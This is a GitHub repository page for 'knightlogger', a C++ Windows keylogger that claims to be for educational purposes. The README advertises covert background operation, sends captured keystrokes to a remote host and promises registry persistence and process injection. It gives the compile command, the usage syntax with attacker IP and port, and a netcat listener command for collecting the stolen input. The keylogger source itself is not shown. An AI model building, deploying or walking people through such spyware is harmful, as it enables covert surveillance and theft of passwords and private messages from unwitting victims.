Skip to content

a basic stable keylogger written in C++ for eductional purpose works on windows platforms , i am not responsible for any damage or any bad usage use at your own risk

License

Notifications You must be signed in to change notification settings

mahmoud0x01/knightlogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 

Repository files navigation

knightlogger

a basic stable keylogger written for eductional purpose works on windows platforms notice this progeam is making high cpu usage

options

  • remote access keylogger
  • works in background secretly -> additional functions will be added soon like registery persistence and inject in system proccesses

compile

g++ -o knightlogger.exe knightlogger.cpp -lwsock32 lwsock32 for telling g++ to link windows socket library

easy to use knightlogger.exe ipaddr portnumber

you can listen for connection by many ways for example netcat way nc -lvp 4444

notice: support only english main alphabet ascii characters and some other special keys but not all , i will add full support soon

About

a basic stable keylogger written in C++ for eductional purpose works on windows platforms , i am not responsible for any damage or any bad usage use at your own risk

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages